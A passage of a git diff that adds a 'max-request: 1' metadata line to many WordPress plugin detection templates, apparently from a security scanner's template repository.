b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 840c086fb9..575c9ebe67 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml index a8eca7b056..2409c6b370 100644 --- a/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml +++ b/http/technologies/wordpress/plugins/header-and-footer-scripts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-and-footer-scripts/ metadata: + max-request: 1 plugin_namespace: header-and-footer-scripts wpscan: https://wpscan.com/plugin/header-and-footer-scripts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..4ecac0cd92 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/hello-dolly/ metadata: + max-request: 1 plugin_namespace: hello-dolly wpscan: https://wpscan.com/plugin/hello-dolly tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..e50f58cef8 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/host-webfonts-local/ metadata: + max-request: 1 plugin_namespace: host-webfonts-local wpscan: https://wpscan.com/plugin/host-webfonts-local tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..031bb48563 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imagify/ metadata: + max-request: 1 plugin_namespace: imagify wpscan: https://wpscan.com/plugin/imagify tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..3cdcf3da93 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/imsanity/ metadata: + max-request: 1 plugin_namespace: imsanity wpscan: https://wpscan.com/plugin/imsanity tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c222bc9d4a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/insert-headers-and-footers/ metadata: + max-request: 1 plugin_namespace: insert-headers-and-footers wpscan: https://wpscan.com/plugin/insert-headers-and-footers tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 43cb2ab09c..c8acf8c625 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/instagram-feed/ metadata: + max-request: 1 plugin_namespace: instagram-feed wpscan: https://wpscan.com/plugin/instagram-feed tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..66b7d6a363 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order 